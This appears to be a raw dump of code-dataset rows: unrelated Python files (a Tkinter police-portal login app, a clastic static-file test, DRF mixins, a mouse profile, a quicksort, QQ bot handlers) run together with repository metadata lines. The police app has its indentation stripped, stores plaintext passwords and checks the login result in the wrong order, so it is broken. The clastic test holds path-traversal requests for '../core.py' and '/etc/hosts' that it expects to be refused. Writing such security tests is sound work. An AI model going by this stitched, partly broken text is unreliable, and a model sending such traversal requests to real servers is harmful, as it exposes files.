cursor.execute('CREATE TABLE IF NOT EXISTS POLICE(POLICEID TEXT PRIMARY KEY CHECK(POLICEID <> ""), PASSWORD TEXT NOT NULL CHECK(PASSWORD <> ""),FNAME TEXT NOT NULL CHECK(FNAME <> ""), MNAME TEXT, LNAME TEXT NOT NULL CHECK(LNAME <> ""), PHOTO BLOB NOT NULL, LASTLOGIN TEXT, EMAILID TEXT NOT NULL CHECK(EMAILID <> ""), JURISDICTION TEXT NOT NULL CHECK(JURISDICTION <> ""), ADDRESS TEXT NOT NULL CHECK(ADDRESS <> ""), GENDER TEXT NOT NULL CHECK(GENDER <> ""), DOB TEXT NOT NULL CHECK(DOB <> ""), BATCH TEXT NOT NULL CHECK(BATCH <> ""), RANK TEXT NOT NULL CHECK(RANK <> ""), MARITALSTATUS TEXT NOT NULL)')
cursor.execute("""CREATE TABLE IF NOT EXISTS POLICE1(POLICEID TEXT, CONTACT TEXT NOT NULL, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS COMPLAINT (COMPLAINT_NO text PRIMARY KEY, PLACEOFCRIME text NOT NULL CHECK(PLACEOFCRIME <> ''), TIMEOFCRIME text, CRIMEDESCRIPTION text, CITY text, POLICESTATION text, STATUS text, VFNAME text, VMNAME text, VLNAME text, AFNAME text, AMNAME text, ALNAME text, USERID text, FOREIGN KEY(USERID) REFERENCES CIVILIAN1(USERID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS CIVILIAN1 (USERID text PRIMARY KEY CHECK(USERID <> ''), PASSWORD text NOT NULL CHECK(PASSWORD <> ''), FNAME text, MNAME text, LNAME text, DOB text, GENDER text, MARITALSTATUS text, EMAILID text NOT NULL, OCCUPATION text, ADDRESS text, LASTLOGIN text, PHOTO blob)""")
cursor.execute('CREATE TABLE IF NOT EXISTS CIVILIAN2 (USERID text , CONTACT number,FOREIGN KEY (USERID) REFERENCES CIVILIAN1(USERID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL(CRIMINALID number PRIMARY KEY, FNAME text, MNAME text, LNAME text, DOB text, BLOODGROUP text, STATUS text, PRIORITY number, GENDER text, PHOTO BLOB NOT NULL)')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE1 (CASENO number PRIMARY KEY, PENALCODETYPE text, SECTIONNUMBER number, POLICESTATION text, DESCRIPTION text NOT NULL, OPENDATE text NOT NULL, CLOSEDATE text, COMPLAINT_NO TEXT, FOREIGN KEY (COMPLAINT_NO) REFERENCES COMPLAINT(COMPLAINT_NO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL3 (CRIMINALID text, CONTACT text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE2(CASENO number, POLICEID text, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID), FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE3(CASENO number , VFNAME text, VMNAME text, VLNAME text, VAGE number, VADDRESS text, FOREIGN KEY (CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE4(CASENO number, FIRNO number, FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO), FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL2(CRIMINALID text, ADDRESS text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL1 (CRIMINALID text, IDENTIFICATIONMARKS text,FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME2 (FIRNO number, CRIMINALID number, FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO), FOREIGN KEY(CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME3 (FIRNO number, PENALCODETYPE text, SECTIONNUMBER number, FOREIGN KEY (FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute( 'CREATE TABLE IF NOT EXISTS CRIME(FIRNO number PRIMARY KEY, DAMAGEAMOUNT number, INJURED number, DEATHS number, DATEOFCRIME text NOT NULL, PLACEOFCRIME text)')
connection.commit()
t=tk.Tk()
t.title('NCDS')
t.configure(background = 'white')
#t.geometry("1500x800+30+30")
w, h = t.winfo_screenwidth(), t.winfo_screenheight()
t.geometry("%dx%d+0+0" % (w, h))
#fontStyle = tkFont.Font(family="Times New Roman", size=60)
def enter():
getuid = uid.get()
getpswd = pswd.get()
if v.get()=='Civilian':
u = cursor.execute('SELECT USERID FROM CIVILIAN1 where USERID=(?) and PASSWORD=(?)', (getuid,getpswd))
temp=u.fetchall()
if getuid == temp[0][0] and len(temp)>0:
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
civ_home(getuid)
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
elif v.get()=='Police':
u = cursor.execute('SELECT POLICEID,RANK FROM POLICE where POLICEID=(?) and PASSWORD=(?)', (getuid,getpswd))
temp=u.fetchall()
if len(temp)>0:
if getuid == temp[0][0]:
if temp[0][1] == 'ACP':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
acp_home(getuid)
elif temp[0][1] == 'CONSTABLE':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
const_home(getuid)
elif temp[0][1] == 'SYSTEM ADMINISTRATOR':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
system_home(getuid)
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
else:
tkinter.messagebox.showinfo('Title','Choose User Type')
def clear():
uid.delete(0, 'end')
pswd.delete(0, 'end')
v.set('User Type')
return
def register():
t.destroy()
os.system('python registration_page.py')
return
def close():
try:
for i in range(6):
os.remove('z'+str(i)+'.jpg')
except:
pass
t.destroy()
import sys
sys.exit()
return
OptionList=['Police','Civilian']
v = tk.StringVar(t)
v.set('Select User Type'.upper())
opt = tk.OptionMenu(t, v, *OptionList)
fing=tkFont.Font(family="Times New Roman", size=16)
opt.configure(relief="solid",font=tkFont.Font(family="Times New Roman", size=20))
impmsg=Label(t, text='WELCOME TO POLICE PORTAL',bg='black', fg='white',font=tkFont.Font(family="Times New Roman", size=60), borderwidth=2, relief="solid")
wanted=Label(t, text='T O P W A N T E D', fg='red',font=tkFont.Font(family="Times New Roman", size=40), borderwidth=2, relief="solid")
detail=Label(t, text='Enter Below details to Login',bg='white',fg='black',font=tkFont.Font(family="Times New Roman", size=20), borderwidth=2, relief="solid")
user=Label(t, text='USER ID ',font=fing,borderwidth=2, relief="solid")
password=Label(t, text='PASSWORD',font=fing, borderwidth=2,relief="solid")
uid=Entry(t,font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
pswd=Entry(t,show='*',font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
submit=Button(t, text='SUBMIT', command=enter,font=fing, borderwidth=2, relief="solid")
reset=Button(t, text='CLEAR', command=clear,font=fing, borderwidth=2, relief="solid")
signup=Button(t, text='REGISTER', command=register, borderwidth=2, relief="solid")
close=Button(t, text='EXIT', command=close, font=fing,borderwidth=2, relief="solid")
signup.configure(font=("Times New Roman",25,'bold'))
f=cursor.execute('SELECT PHOTO from CRIMINAL order by priority')
temp=f.fetchall()
plist=[]
if len(temp)>=6:
for i in range(6):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
else:
for i in range(len(temp)):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
for i in range (len(temp)-1,6):
plist.append('demo.jpg')
t.load1 = Image.open(plist[0])
t.load1 = t.load1.resize((200, 200), Image.ANTIALIAS)
t.photo1 = ImageTk.PhotoImage(t.load1, master=t)
t.img1 = Label(t, image=t.photo1, borderwidth=2, relief="solid")
t.img1.image = t.photo1
t.load2 = Image.open(plist[1])
t.load2 = t.load2.resize((200, 200), Image.ANTIALIAS)
t.photo2 = ImageTk.PhotoImage(t.load2, master=t)
t.img2 = Label(t, image=t.photo2, borderwidth=2, relief="solid")
t.img2.image = t.photo2
t.load3 = Image.open(plist[2])
t.load3 = t.load3.resize((200, 200), Image.ANTIALIAS)
t.photo3 = ImageTk.PhotoImage(t.load3, master=t)
t.img3 = Label(t, image=t.photo3, borderwidth=2, relief="solid")
t.img3.image = t.photo3
t.load4 = Image.open(plist[3])
t.load4 = t.load4.resize((200, 200), Image.ANTIALIAS)
t.photo4 = ImageTk.PhotoImage(t.load4, master=t)
t.img4 = Label(t, image=t.photo4, borderwidth=2, relief="solid")
t.img4.image = t.photo4
t.load5 = Image.open(plist[4])
t.load5 = t.load5.resize((200, 200), Image.ANTIALIAS)
t.photo5 = ImageTk.PhotoImage(t.load5, master=t)
t.img5 = Label(t, image=t.photo5, borderwidth=2, relief="solid")
t.img5.image = t.photo5
t.load6 = Image.open(plist[5])
t.load6 = t.load6.resize((200, 200), Image.ANTIALIAS)
t.photo6 = ImageTk.PhotoImage(t.load6, master=t)
t.img6 = Label(t, image=t.photo6, borderwidth=2, relief="solid")
t.img6.image = t.photo6
impmsg.place(x=0, y=5, width=w, height=100)
wanted.place(x=600, y=160, width=800, height=70)
detail.place(x=90 , y=200, width=410, height=75)
opt.place(x = 90, y = 300 , width=410, height=70)
user.place(x = 90, y = 380 , width=200, height=70)
uid.place(x = 300, y = 380 , width=200, height=70)
password.place(x = 90, y = 460 , width=200, height=70)
pswd.place(x = 300, y = 460 , width=200, height=70)
submit.place(x = 90, y = 540, width=200, height=70)
reset.place(x = 300, y = 540 , width=200, height=70)
signup.place(x= 90, y = 630, width = 200, height = 70)
close.place(x= 300, y = 630, width = 200, height = 70)
t.img1.place(x = 600, y = 250 , width=200, height=200)
t.img2.place(x = 900, y = 250 , width=200, height=200)
t.img3.place(x = 1200, y = 250 , width=200, height=200)
t.img4.place(x = 600, y = 500 , width=200, height=200)
t.img5.place(x = 900, y = 500 , width=200, height=200)
t.img6.place(x = 1200, y = 500 , width=200, height=200)
mainloop()
| 1,993 | 0 | 100 |
f4d07cab853998e94b41d3ffb56b1ab1d49e28bb | 1,470 | py | Python | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 140 | 2015-02-11T19:03:30.000Z | 2022-03-12T23:30:46.000Z | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 21 | 2015-09-16T04:33:09.000Z | 2021-11-08T04:46:32.000Z | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 22 | 2015-09-15T19:30:06.000Z | 2021-11-05T17:22:20.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from clastic import Application, StaticApplication, StaticFileRoute
_CUR_DIR = os.path.dirname(os.path.abspath(__file__))
| 34.186047 | 109 | 0.664626 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from clastic import Application, StaticApplication, StaticFileRoute
_CUR_DIR = os.path.dirname(os.path.abspath(__file__))
def test_basic_static_serve():
static_app = StaticApplication(_CUR_DIR)
app = Application([('/static/', static_app)])
c = app.get_local_client()
resp = c.get('/static/test_static.py')
assert resp.mimetype in ('text/x-python', 'text/plain') # text/plain on appveyor/windows for some reason
resp = c.get('/static/does_not_exist.txt')
assert resp.status_code == 404
resp = c.get('/static/../core.py')
assert resp.status_code == 403
resp = c.get('/static/_ashes_tmpls/basic_template.html')
assert resp.status_code == 200
resp = c.get('/static/_ashes_tmpls/../../core.py')
assert resp.status_code == 403
# check that we don't navigate to root
resp = c.get('/static//etc/hosts')
if os.path.exists('/etc/hosts'):
assert resp.status_code == 403
else:
assert resp.status_code == 404 # mostly windows
def test_basic_static_route():
static_app = Application([StaticFileRoute('/source_code',
_CUR_DIR + '/test_static.py')])
c = static_app.get_local_client()
resp = c.get('/source_code')
assert resp.mimetype in ('text/x-python', 'text/plain') # text/plain on appveyor/windows for some reason
assert resp.status_code == 200
| 1,223 | 0 | 46 |
27a69b32835653f5833e413c6df8b6d71ff2add8 | 296 | py | Python | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | null | null | null | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | 1 | 2020-05-09T06:12:34.000Z | 2020-07-31T23:58:55.000Z | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | null | null | null | from .rival300csgofadeedition import rival300csgofadeedition
rival300csgofadeeditionstm32 = {
"name": "SteelSeries Rival 300 CS:GO Fade Edition (stm32)",
"vendor_id": 0x1038,
"product_id": 0x1716,
"interface_number": 0,
"commands": rival300csgofadeedition["commands"],
}
| 21.142857 | 63 | 0.722973 | from .rival300csgofadeedition import rival300csgofadeedition
rival300csgofadeeditionstm32 = {
"name": "SteelSeries Rival 300 CS:GO Fade Edition (stm32)",
"vendor_id": 0x1038,
"product_id": 0x1716,
"interface_number": 0,
"commands": rival300csgofadeedition["commands"],
}
| 0 | 0 | 0 |
1642a81148ba8a39cfb9b6e7eaf0edc2d0068c45 | 2,942 | py | Python | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | """
Basic building blocks for generic class based views.
We don't bind behaviour to http method handlers yet,
which allows mixin classes to be composed in interesting ways.
"""
from rest_framework import status
from rest_framework.response import Response
from rest_framework.settings import api_settings
class CreateModelMixin:
"""
Create a model instance.
"""
class ListModelMixin:
"""
List a queryset.
"""
class RetrieveModelMixin:
"""
Retrieve a model instance.
"""
class UpdateModelMixin:
"""
Update a model instance.
"""
class DestroyModelMixin:
"""
Destroy a model instance.
"""
| 29.128713 | 89 | 0.670292 | """
Basic building blocks for generic class based views.
We don't bind behaviour to http method handlers yet,
which allows mixin classes to be composed in interesting ways.
"""
from rest_framework import status
from rest_framework.response import Response
from rest_framework.settings import api_settings
class CreateModelMixin:
"""
Create a model instance.
"""
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def perform_create(self, serializer):
serializer.save()
def get_success_headers(self, data):
try:
return {'Location': str(data[api_settings.URL_FIELD_NAME])}
except (TypeError, KeyError):
return {}
class ListModelMixin:
"""
List a queryset.
"""
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
class RetrieveModelMixin:
"""
Retrieve a model instance.
"""
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
return Response(serializer.data)
class UpdateModelMixin:
"""
Update a model instance.
"""
def update(self, request, *args, **kwargs):
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
return Response(serializer.data)
def perform_update(self, serializer):
serializer.save()
def partial_update(self, request, *args, **kwargs):
kwargs['partial'] = True
return self.update(request, *args, **kwargs)
class DestroyModelMixin:
"""
Destroy a model instance.
"""
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response(status=status.HTTP_204_NO_CONTENT)
def perform_destroy(self, instance):
instance.delete()
| 2,015 | 0 | 270 |
122e95d4baae685b706171f2dece5179f5075bb8 | 1,448 | py | Python | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 14 | 2018-04-19T09:53:56.000Z | 2022-01-27T06:05:48.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 15 | 2018-09-11T05:39:54.000Z | 2021-07-02T12:38:02.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 33 | 2018-04-20T05:29:16.000Z | 2022-02-17T09:10:05.000Z | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
| 36.2 | 114 | 0.70511 | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class PasswordPolicy(object):
def __init__(self, length, age, expirationOperation, reusePrevention, retryTimes, validLoginDuration, rule, ):
"""
:param length: 密码长度,6~20位,默认8位
:param age: 密码有效期(天),0~1095,0表示永不过期
:param expirationOperation: 密码过期后重置方式:0-联系主账号重置,1-子用户登录后重置
:param reusePrevention: 历史密码检查策略,禁止使用前(0~10)次密码,0表示不启用
:param retryTimes: 1小时内使用错误密码最多(1~16)次
:param validLoginDuration:
:param rule: 密码字符类型,至少包含一种
"""
self.length = length
self.age = age
self.expirationOperation = expirationOperation
self.reusePrevention = reusePrevention
self.retryTimes = retryTimes
self.validLoginDuration = validLoginDuration
self.rule = rule
| 0 | 956 | 23 |
46c492579f3a6a53a967d7c529429054efe10656 | 674 | py | Python | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | from actions.security import Security
from command_abc import AbsCommand
| 24.071429 | 47 | 0.630564 | from actions.security import Security
from command_abc import AbsCommand
class SecurityArmCommand(AbsCommand):
def __init__(self, security):
if not isinstance(security, Security):
raise TypeError
self.security = security
def execute(self):
self.security.arm()
def undo(self):
self.security.disarm()
class SecurityDisarmCommand(AbsCommand):
def __init__(self, security):
if not isinstance(security, Security):
raise TypeError
self.security = security
def execute(self):
self.security.disarm()
def undo(self):
self.security.arm() | 342 | 35 | 219 |
346c9fbe4b8cd7d6a72238b1d822157888c23cd2 | 1,299 | py | Python | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
import random
j = 1
while j <= 1000:
x = [random.randint(0,999999999999) for i in range(0,j)]
y = [a for a in x]
z = [a for a in x]
y.sort()
quick_sort(x, 0, len(x) - 1)
if y != x:
print("Sorting failed for {}".format(z))
break
j += 1
print("Success on iteration {}".format(j - 1))
| 27.0625 | 64 | 0.461894 | def quick_sort(arr, start, end):
if start == end:
return
if end - start == 1:
if arr[start] > arr[end]:
arr[end], arr[start] = arr[start],arr[end]
return
i = start + 1
j = end
pivot = arr[start]
while i <= j:
if arr[i] <= pivot:
i += 1
continue
while arr[j] > pivot and j > i:
j -= 1
if j == i:
# all elements from index i are greater than pivot
break
#element a[j] < pivot, a[i] >= pivot , j > i
arr[j], arr[i] = arr[i], arr[j]
i += 1
j -= 1
# from index i onwards everything is >= pivot
# below index i, everything is < pivot
i -= 1
if i - start > 0:
arr[i], arr[start] = arr[start], arr[i]
quick_sort(arr, start, i - 1)
if i + 1 < end:
quick_sort(arr, i + 1, end)
if __name__ == '__main__':
import random
j = 1
while j <= 1000:
x = [random.randint(0,999999999999) for i in range(0,j)]
y = [a for a in x]
z = [a for a in x]
y.sort()
quick_sort(x, 0, len(x) - 1)
if y != x:
print("Sorting failed for {}".format(z))
break
j += 1
print("Success on iteration {}".format(j - 1))
| 867 | 0 | 22 |
f4ea2628c2086ae731105fbb0a4174a279be290e | 4,940 | py | Python | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 63 | 2021-12-27T05:55:07.000Z | 2022-03-28T12:28:53.000Z | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 9 | 2022-01-06T03:33:30.000Z | 2022-03-27T10:49:36.000Z | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 12 | 2021-12-31T07:46:12.000Z | 2022-03-28T13:34:09.000Z | # -*- coding: utf-8 -*-
from enum import Enum
from qqbot.core.network.ws.ws_event import WsEvent
from qqbot.core.network.ws.ws_handler import DefaultHandler
def register_handlers(handlers):
"""
RegisterHandlers 注册事件回调,并返回 intent 用于 websocket 的鉴权
"""
intent = 0
for handler in handlers:
call_handler = intent_handler_dict.get(handler.type.value)
intent = intent | call_handler(handler.callback, intent)
return intent
intent_handler_dict = {
HandlerType.PLAIN_EVENT_HANDLER.value: plain_event_handler,
HandlerType.GUILD_EVENT_HANDLER.value: guild_event_handler,
HandlerType.GUILD_MEMBER_EVENT_HANDLER.value: guild_member_event_handler,
HandlerType.CHANNEL_EVENT_HANDLER.value: channel_event_handler,
HandlerType.MESSAGE_EVENT_HANDLER.value: message_event_handler,
HandlerType.MESSAGE_DELETE_EVENT_HANDLER.value: delete_message_event_handler,
HandlerType.AT_MESSAGE_EVENT_HANDLER.value: at_message_event_handler,
HandlerType.PUBLIC_MESSAGE_DELETE_EVENT_HANDLER.value: public_message_delete_event_handler,
HandlerType.DIRECT_MESSAGE_EVENT_HANDLER.value: direct_message_event_handler,
HandlerType.DIRECT_MESSAGE_DELETE_EVENT_HANDLER.value: delete_direct_message_event_handler,
HandlerType.AUDIO_EVENT_HANDLER.value: audio_event_handler,
HandlerType.MESSAGE_REACTIONS_EVENT_HANDLER.value: message_reactions_event_handler,
HandlerType.INTERACTION_CREATE_HANDLER.value: interaction_create_event_handler,
}
| 31.666667 | 95 | 0.777328 | # -*- coding: utf-8 -*-
from enum import Enum
from qqbot.core.network.ws.ws_event import WsEvent
from qqbot.core.network.ws.ws_handler import DefaultHandler
class Handler:
def __init__(self, handler_type, callback):
self.type = handler_type
self.callback = callback
def register_handlers(handlers):
"""
RegisterHandlers 注册事件回调,并返回 intent 用于 websocket 的鉴权
"""
intent = 0
for handler in handlers:
call_handler = intent_handler_dict.get(handler.type.value)
intent = intent | call_handler(handler.callback, intent)
return intent
def plain_event_handler(callback, intent):
DefaultHandler.plain = callback
return intent
def guild_event_handler(callback, intent):
DefaultHandler.guild = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventGuildCreate, WsEvent.EventGuildDelete, WsEvent.EventGuildUpdate
)
return intent
def guild_member_event_handler(callback, intent):
DefaultHandler.guild_member = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventGuildMemberAdd,
WsEvent.EventGuildMemberRemove,
WsEvent.EventGuildMemberUpdate,
)
return intent
def audio_event_handler(callback, intent):
DefaultHandler.audio = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventAudioStart,
WsEvent.EventAudioFinish,
WsEvent.EventAudioOnMic,
WsEvent.EventAudioOffMic,
)
return intent
def channel_event_handler(callback, intent):
DefaultHandler.channel = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventChannelCreate,
WsEvent.EventChannelDelete,
WsEvent.EventChannelUpdate,
)
return intent
def message_event_handler(callback, intent):
DefaultHandler.message_create = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventMessageCreate)
return intent
def delete_message_event_handler(callback, intent):
DefaultHandler.message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventMessageDelete)
return intent
def at_message_event_handler(callback, intent):
DefaultHandler.at_message = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventAtMessageCreate)
return intent
def public_message_delete_event_handler(callback, intent):
DefaultHandler.public_message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventPublicMessageDelete)
return intent
def direct_message_event_handler(callback, intent):
DefaultHandler.direct_message_create = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventDirectMessageCreate)
return intent
def delete_direct_message_event_handler(callback, intent):
DefaultHandler.direct_message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventDirectMessageDelete)
return intent
def message_reactions_event_handler(callback, intent):
DefaultHandler.message_reaction = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventMessageReactionAdd,
WsEvent.EventMessageReactionRemove,
)
return intent
def interaction_create_event_handler(callback, intent):
DefaultHandler.interaction_create = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventInteractionCreate
)
return intent
class HandlerType(Enum):
PLAIN_EVENT_HANDLER = 0
GUILD_EVENT_HANDLER = 1
GUILD_MEMBER_EVENT_HANDLER = 2
CHANNEL_EVENT_HANDLER = 3
MESSAGE_EVENT_HANDLER = 4
MESSAGE_DELETE_EVENT_HANDLER = 5
AT_MESSAGE_EVENT_HANDLER = 6
DIRECT_MESSAGE_EVENT_HANDLER = 7
DIRECT_MESSAGE_DELETE_EVENT_HANDLER = 8
AUDIO_EVENT_HANDLER = 9
MESSAGE_REACTIONS_EVENT_HANDLER = 10
PUBLIC_MESSAGE_DELETE_EVENT_HANDLER = 11
INTERACTION_CREATE_HANDLER = 12
intent_handler_dict = {
HandlerType.PLAIN_EVENT_HANDLER.value: plain_event_handler,
HandlerType.GUILD_EVENT_HANDLER.value: guild_event_handler,
HandlerType.GUILD_MEMBER_EVENT_HANDLER.value: guild_member_event_handler,
HandlerType.CHANNEL_EVENT_HANDLER.value: channel_event_handler,
HandlerType.MESSAGE_EVENT_HANDLER.value: message_event_handler,
HandlerType.MESSAGE_DELETE_EVENT_HANDLER.value: delete_message_event_handler,
HandlerType.AT_MESSAGE_EVENT_HANDLER.value: at_message_event_handler,
HandlerType.PUBLIC_MESSAGE_DELETE_EVENT_HANDLER.value: public_message_delete_event_handler,
HandlerType.DIRECT_MESSAGE_EVENT_HANDLER.value: direct_message_event_handler,
HandlerType.DIRECT_MESSAGE_DELETE_EVENT_HANDLER.value: delete_direct_message_event_handler,
HandlerType.AUDIO_EVENT_HANDLER.value: audio_event_handler,
HandlerType.MESSAGE_REACTIONS_EVENT_HANDLER.value: message_reactions_event_handler,
HandlerType.INTERACTION_CREATE_HANDLER.value: interaction_create_event_handler,
}
| 2,608 | 448 | 371 |
6a5b7b85e25ad6e52a7e2f33c9b07580428c05e1 | 210 | py | Python | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | 2 | 2021-06-22T18:24:42.000Z | 2021-10-04T12:03:04.000Z | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | null | null | null | dmk/b_cryptoblobs/__init__.py | rtmigo/ksf_py | 63be2af622181e8c2bbe4b318f4b780a38ee6606 | [
"MIT"
] | 1 | 2021-06-20T04:04:51.000Z | 2021-06-20T04:04:51.000Z | # SPDX-FileCopyrightText: (c) 2021 Artёm IG <github.com/rtmigo>
# SPDX-License-Identifier: MIT
